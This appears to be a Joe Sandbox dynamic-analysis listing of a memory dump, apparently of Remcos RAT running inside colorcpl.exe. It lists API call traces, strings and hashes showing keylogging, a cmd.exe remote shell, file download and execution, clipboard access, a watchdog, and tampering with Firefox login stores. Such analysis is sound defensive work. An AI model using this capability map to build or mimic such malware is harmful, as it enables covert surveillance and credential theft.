                                                                • Part of subcall function 0309966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,03099745), ref: 030996A3
                                                                • Part of subcall function 0309966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,03099745), ref: 030996B2
                                                                • Part of subcall function 0309966D: Sleep.KERNEL32(00002710,?,?,?,03099745), ref: 030996DF
                                                                • Part of subcall function 0309966D: CloseHandle.KERNEL32(00000000,?,?,?,03099745), ref: 030996E6
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03099774
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 03099785
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0309979C
                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 03099816
                                                                • Part of subcall function 030AA20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA228
                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,030F9654,?,00000000,00000000,00000000,00000000,00000000), ref: 0309991F
                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                              • String ID:
                                                              • API String ID: 3795512280-0

                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00000000,030AA29A,00000000,00000000,00000000), ref: 030AA1BA
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,00000000,030AA29A,00000000,00000000,00000000,00000000,030A533F,00000002,00000001), ref: 030AA1D7
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,030AA29A,00000000,00000000,00000000,00000000,030A533F,00000002,00000001), ref: 030AA1E3
                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,030AA29A,00000000,00000000,00000000,00000000,030A533F,00000002,00000001), ref: 030AA1F4
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,030AA29A,00000000,00000000,00000000,00000000,030A533F,00000002,00000001), ref: 030AA201
                                                              • API ID: File$CloseHandle$CreatePointerWrite
                                                              • String ID:
                                                              • API String ID: 1852769593-0

                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,03099305,?,00000000,00000000), ref: 0309928B
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 0309929B
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 030992A7
                                                                • Part of subcall function 0309A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
                                                                • Part of subcall function 0309A0B0: wsprintfW.USER32 ref: 0309A13F
                                                              • API ID: CreateThread$LocalTimewsprintf
                                                              • String ID: Offline Keylogger Started
                                                              • API String ID: 465354869-4114347211
                                                              APIs
                                                              • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,030F30C0), ref: 030A216E
                                                              • RegSetValueExA.KERNEL32(030F30C0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,030AA83B,WallpaperStyle,030F30C0), ref: 030A2196
                                                              • RegCloseKey.KERNEL32(030F30C0,?,?,030AA83B,WallpaperStyle,030F30C0), ref: 030A21A1
                                                              • API ID: CloseCreateValue
                                                              • String ID: Control Panel\Desktop
                                                              • API String ID: 1818849710-27424756
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 030A1F54
                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,03102200), ref: 030A1F72
                                                              • RegCloseKey.KERNEL32(?), ref: 030A1F7D
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: pth_unenc
                                                              • API String ID: 3677997916-4028850238
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,03099745), ref: 030996A3
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,03099745), ref: 030996B2
                                                              • Sleep.KERNEL32(00002710,?,?,?,03099745), ref: 030996DF
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,03099745), ref: 030996E6
                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                              • String ID:
                                                              • API String ID: 1958988193-0
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,00000000,00000000,00000000), ref: 030A1FB5
                                                              • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 030A1FD2
                                                              • RegCloseKey.KERNEL32(00000000), ref: 030A1FDD
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              APIs
                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,03102200), ref: 030A2104
                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 030A211D
                                                              • RegCloseKey.KERNEL32(00000000), ref: 030A2128
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 030A97AB
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID: @
                                                              • API String ID: 1890195054-2766056989
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: c5e83f2bd3cd9601e39e3acfc4ffe1b163aaedd6eba71807d5215bd62b1e19e7
                                                              • Instruction ID: 4199361dfedbfbc86564199bc85c83de89a212fce4875aecffcc4a04eb021676
                                                              • Opcode Fuzzy Hash: c5e83f2bd3cd9601e39e3acfc4ffe1b163aaedd6eba71807d5215bd62b1e19e7
                                                              • Instruction Fuzzy Hash: 61E0E52E607B2158D2A1F33E7C047AE16C48BC1375F155265E8288F5C8DF6484038562
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                              • Instruction ID: 16a046033c77d718100d434db9e379a81e4bb9c31cdfb1e690d846852092bf08
                                                              • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                              • Instruction Fuzzy Hash: 3EF0A7B1B1734269EF5CD734C85466E779A4B84251F288EAFF05BC54D0D730C895D604
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,031024A0), ref: 030A9A9B
                                                              • GetWindowTextW.USER32(00000000,?,00000200), ref: 030A9AAA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$ForegroundText
                                                              • String ID:
                                                              • API String ID: 29597999-0
                                                              • Opcode ID: 290937059104e2001562e3002550714c3fe35b914ecb7ee3df89fea45d521205
                                                              • Instruction ID: 165c2614eda5ea4da789d96853f62e324a500310a57d9fdcd4740430fd23d662
                                                              • Opcode Fuzzy Hash: 290937059104e2001562e3002550714c3fe35b914ecb7ee3df89fea45d521205
                                                              • Instruction Fuzzy Hash: CFE09B76E0131C27EB20A6AAFC4DFEBB77CEB90710F04019AF518C7141E9655D0586E0
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 03098F39
                                                                • Part of subcall function 03099203: CreateThread.KERNEL32(00000000,00000000,03099305,?,00000000,00000000), ref: 0309928B
                                                                • Part of subcall function 03099203: CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 0309929B
                                                                • Part of subcall function 03099203: CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 030992A7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$_wcslen
                                                              • String ID:
                                                              • API String ID: 1119755333-0
                                                              • Opcode ID: aaab440111410d7c56923a56402dd1f69cc801ab6d231274b7b29b19cad54166
                                                              • Instruction ID: c539ebcba7693c391c7f8e27448bbc4a0473044bb84537d369eae0da108d2c10
                                                              • Opcode Fuzzy Hash: aaab440111410d7c56923a56402dd1f69cc801ab6d231274b7b29b19cad54166
                                                              • Instruction Fuzzy Hash: 4521D839A0634A5FEF09FFB4D9519FE7BB9AF85200F00041BE4016A295DF30564AE791
                                                              APIs
                                                              • CallNextHookEx.USER32(03102008,?,?,?), ref: 0309945A
                                                                • Part of subcall function 0309A592: GetKeyState.USER32(00000011), ref: 0309A597
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallHookNextState
                                                              • String ID:
                                                              • API String ID: 3280314413-0
                                                              • Opcode ID: e20f556008663d474a30b475c3a14a7a2953230e6ac7fd1225d414ae9cd0ec36
                                                              • Instruction ID: 50f2a6418da12df400d00c778003ce222b6e921a0c82fc963412a81747179961
                                                              • Opcode Fuzzy Hash: e20f556008663d474a30b475c3a14a7a2953230e6ac7fd1225d414ae9cd0ec36
                                                              • Instruction Fuzzy Hash: 57F0D1363063059AFE46FE789C449AEB7DAEBD5210F00446FE6024A961CB618804A652
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 9ace0ed03f6fe2797654ddcd146a6985ede45e8244fbb4891162fcf15d9a2753
                                                              • Instruction ID: d4112fe2aa21db435f0effc1411fd6f58a1b9c806bbef3061bb0780d9e21e639
                                                              • Opcode Fuzzy Hash: 9ace0ed03f6fe2797654ddcd146a6985ede45e8244fbb4891162fcf15d9a2753
                                                              • Instruction Fuzzy Hash: 46E0652D2133256BDAE1E6655C04B9F76CCDF816E1F0EC6A5AC459A6C0CB61C80045A6
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID:
                                                              • API String ID: 1507349165-0
                                                              • Opcode ID: 2c679946ebfe889a07455d35dc476190873b97e23a598303c012bc6d630fd2bf
                                                              • Instruction ID: 882367fdf651338cf0a0b45d99554feab37f896e35f8b7f85e684fcdbdb4e7f5
                                                              • Opcode Fuzzy Hash: 2c679946ebfe889a07455d35dc476190873b97e23a598303c012bc6d630fd2bf
                                                              • Instruction Fuzzy Hash: 7DB09BB5106105FFDA051750DC0486F7DB997C8780B004C0CB14640120C53684505711
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: 027b135839ddd45c6965ebd52977b17fe7de1c1d1f981170cbc1558098a5dce8
                                                              • Instruction ID: 1a373b4ea05447ca3f150aa172be91d8be20b7cc243b5e636043ee510eb2eee0
                                                              • Opcode Fuzzy Hash: 027b135839ddd45c6965ebd52977b17fe7de1c1d1f981170cbc1558098a5dce8
                                                              • Instruction Fuzzy Hash: 1DB09BB5105205FFDA061750DC0486F7D75A7C8780B004C0CF15640120C53684505711
                                                              APIs
                                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 03094DBB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a375082d7121d4c1aa2dcfa7db829af81c7ff7023ea315dfba71a08dc2242d71
                                                              • Instruction ID: 0b0ce59036b742d59b23aec6fecbf1c31ccc3dbc871d2a07b00e0ffa6027eb62
                                                              • Opcode Fuzzy Hash: a375082d7121d4c1aa2dcfa7db829af81c7ff7023ea315dfba71a08dc2242d71
                                                              • Instruction Fuzzy Hash: 5C41E47520A305AFEF14FB61DC10DBFB7EDAFD4310F040A1EB88686290DB249909A751
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?), ref: 03096D4A
                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 03096E18
                                                              • DeleteFileW.KERNEL32(00000000), ref: 03096E3A
                                                                • Part of subcall function 030AA01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,03102200,00000001), ref: 030AA076
                                                                • Part of subcall function 030AA01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,03102200,00000001), ref: 030AA0A6
                                                                • Part of subcall function 030AA01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,03102200,00000001), ref: 030AA0FB
                                                                • Part of subcall function 030AA01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA15C
                                                                • Part of subcall function 030AA01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA163
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 03097228
                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 03097309
                                                              • DeleteFileA.KERNEL32(?), ref: 0309768E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Find$DeleteDirectoryRemove$AttributesCloseDriveEventExecuteFirstLocalLogicalNextShellStringsTime
                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                              • API String ID: 3077191444-1507758755
                                                              • Opcode ID: be7319d95ea1e4fd1274392da82472575ed83c5ae26d9a37445ae003a7cf4465
                                                              • Instruction ID: 8ee6df69bba9a87f2f533e3058038e0d7fd53cee0ded08c28be944cf8d548844
                                                              • Opcode Fuzzy Hash: be7319d95ea1e4fd1274392da82472575ed83c5ae26d9a37445ae003a7cf4465
                                                              • Instruction Fuzzy Hash: BC42B53A7063056FEE08FB78C865AEE77A8AFD1600F400D5EE5424F5D1EE219909E792
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 030956C6
                                                              • __Init_thread_footer.LIBCMT ref: 03095703
                                                              • CreatePipe.KERNEL32(03103BB4,03103B9C,03103AC0,00000000,030F3068,00000000), ref: 03095796
                                                              • CreatePipe.KERNEL32(03103BA0,03103BBC,03103AC0,00000000), ref: 030957AC
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,03103AD0,03103BA4), ref: 0309581F
                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 03095877
                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0309589C
                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 030958C9
                                                                • Part of subcall function 030C2525: __onexit.LIBCMT ref: 030C252B
                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,03101F28,030F306C,00000062,030F3050), ref: 030959C4
                                                              • Sleep.KERNEL32(00000064,00000062,030F3050), ref: 030959DE
                                                              • TerminateProcess.KERNEL32(00000000), ref: 030959F7
                                                              • CloseHandle.KERNEL32 ref: 03095A03
                                                              • CloseHandle.KERNEL32 ref: 03095A0B
                                                              • CloseHandle.KERNEL32 ref: 03095A1D
                                                              • CloseHandle.KERNEL32 ref: 03095A25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexit
                                                              • String ID: SystemDrive$cmd.exe
                                                              • API String ID: 618029711-3633465311
                                                              • Opcode ID: 826162d9882802087ec63f310cb1aede4711f42725d34a0a0b6c308052f835de
                                                              • Instruction ID: 4e5561e3f58ae42b91acbf645494a694a04be68499580910c0d4fc49c44e601e
                                                              • Opcode Fuzzy Hash: 826162d9882802087ec63f310cb1aede4711f42725d34a0a0b6c308052f835de
                                                              • Instruction Fuzzy Hash: 3C913A79602308BFEE09FB25EC50D6E7BACEBC9608F00082FF5559B681DBA59C449761
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32 ref: 030A0B6B
                                                                • Part of subcall function 030A2268: RegCreateKeyA.ADVAPI32(80000001,00000000,030F3050), ref: 030A2276
                                                                • Part of subcall function 030A2268: RegSetValueExA.ADVAPI32(030F3050,000000AF,00000000,00000004,00000001,00000004,?,?,?,0309B093,030F38E0,00000001,000000AF,030F3050), ref: 030A2291
                                                                • Part of subcall function 030A2268: RegCloseKey.ADVAPI32(030F3050,?,?,?,0309B093,030F38E0,00000001,000000AF,030F3050), ref: 030A229C
                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 030A0BAB
                                                              • CloseHandle.KERNEL32(00000000), ref: 030A0BBA
                                                              • CreateThread.KERNEL32(00000000,00000000,030A1253,00000000,00000000,00000000), ref: 030A0C10
                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 030A0E7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                              • API String ID: 3018269243-13974260
                                                              • Opcode ID: 3d43e59d17cfa3721b5607157b5bc3a219658aa5d3e0a8c705e951cde6a62357
                                                              • Instruction ID: b94ce57a2c798d46c65c4d1e1140ca8664681efc3ddc1d285e146ece1881687f
                                                              • Opcode Fuzzy Hash: 3d43e59d17cfa3721b5607157b5bc3a219658aa5d3e0a8c705e951cde6a62357
                                                              • Instruction Fuzzy Hash: C071E6397063055FEA08FBB4EC55EEE77A8AFD1200F40091EF4525F191EF609A09D692
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0309AAF0
                                                              • FindClose.KERNEL32(00000000), ref: 0309AB0A
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0309AC2D
                                                              • FindClose.KERNEL32(00000000), ref: 0309AC53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                              • API String ID: 1164774033-3681987949
                                                              • Opcode ID: bd0007a41aa4bbb6b2ae65112e4e62f9e73bf341e44d113e3c9c5406ebe1d504
                                                              • Instruction ID: ee62fdde511b770c70decb5a6c78ba8d7d4049cca32a3026ebc1cfe2941581ae
                                                              • Opcode Fuzzy Hash: bd0007a41aa4bbb6b2ae65112e4e62f9e73bf341e44d113e3c9c5406ebe1d504
                                                              • Instruction Fuzzy Hash: CC51B135A0630E9FEF18FBB4EC65DEEB778AF91210F00055BE4066E092EF346A45DA41
                                                              APIs
                                                              • OpenClipboard.USER32 ref: 030A4EC2
                                                              • EmptyClipboard.USER32 ref: 030A4ED0
                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 030A4EF0
                                                              • GlobalLock.KERNEL32(00000000), ref: 030A4EF9
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 030A4F2F
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 030A4F38
                                                              • CloseClipboard.USER32 ref: 030A4F55
                                                              • OpenClipboard.USER32 ref: 030A4F5C
                                                              • GetClipboardData.USER32(0000000D), ref: 030A4F6C
                                                              • GlobalLock.KERNEL32(00000000), ref: 030A4F75
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 030A4F7E
                                                              • CloseClipboard.USER32 ref: 030A4F84
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmpty
                                                              • String ID:
                                                              • API String ID: 2339235153-0
                                                              • Opcode ID: faa7d8d145f514b3b7062f7ece2fd26599592c8d642fa424e05a01c2be8de7c4
                                                              • Instruction ID: 71b9fd76f9d7e2f76c1ab7324b554179d1389fee179ba51a46a104f384d4b50b
                                                              • Opcode Fuzzy Hash: faa7d8d145f514b3b7062f7ece2fd26599592c8d642fa424e05a01c2be8de7c4
                                                              • Instruction Fuzzy Hash: 3221A6353473045BEB04FBB4FC58ABE77A8EFE1A01F04085EF5478A185EF3548059A62
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,03102200,00000001), ref: 030AA076
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,03102200,00000001), ref: 030AA0A6
                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,03102200,00000001), ref: 030AA118
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,03102200,00000001), ref: 030AA125
                                                                • Part of subcall function 030AA01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,03102200,00000001), ref: 030AA0FB
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,03102200,00000001), ref: 030AA146
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA15C
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA163
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,03102200,00000001), ref: 030AA16C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                              • String ID: pth_unenc
                                                              • API String ID: 2341273852-4028850238
                                                              • Opcode ID: a599bcb2ec95c3da115cb811ee515906dd46f41c5b81cbc5f2349a052a5da0dd
                                                              • Instruction ID: ed584708ec601d10d946fab83e7b73874a243999ef0ccabfcdf230b9ad0bddb5
                                                              • Opcode Fuzzy Hash: a599bcb2ec95c3da115cb811ee515906dd46f41c5b81cbc5f2349a052a5da0dd
                                                              • Instruction Fuzzy Hash: 1231C771A0671D6ADB60E7B8FC48EDFB3BCAF44610F0406AAE515D6090EF3996C4CB50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$1$2$3$4$5$6$7
                                                              • API String ID: 0-3177665633
                                                              • Opcode ID: e0a869b2e085ebc656c12d169a16c5021a18c2ed476de0c42fd313495d559193
                                                              • Instruction ID: 32906c61ab08b9f2667cbde5dfd3a5f6d0ea3370ba5c37ebe9c0e4cb2c4a6e73
                                                              • Opcode Fuzzy Hash: e0a869b2e085ebc656c12d169a16c5021a18c2ed476de0c42fd313495d559193
                                                              • Instruction Fuzzy Hash: 5E61D17454A3019FEB05EFA4E8A1FEE77D49FC5710F04880EF5925B2D0EA709A09D7A2
                                                              APIs
                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,031027F8), ref: 030A8714
                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 030A8763
                                                              • GetLastError.KERNEL32 ref: 030A8771
                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 030A87A9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                              • String ID:
                                                              • API String ID: 3587775597-0
                                                              • Opcode ID: 2889d2a7ce2baad34d01a257ea4c9a9d6bcde5edbe4e53704b12ff5dfdb25c01
                                                              • Instruction ID: eef7d8314731978acf83af4e407cfe75181251bcea5baf793329263fd9c94074
                                                              • Opcode Fuzzy Hash: 2889d2a7ce2baad34d01a257ea4c9a9d6bcde5edbe4e53704b12ff5dfdb25c01
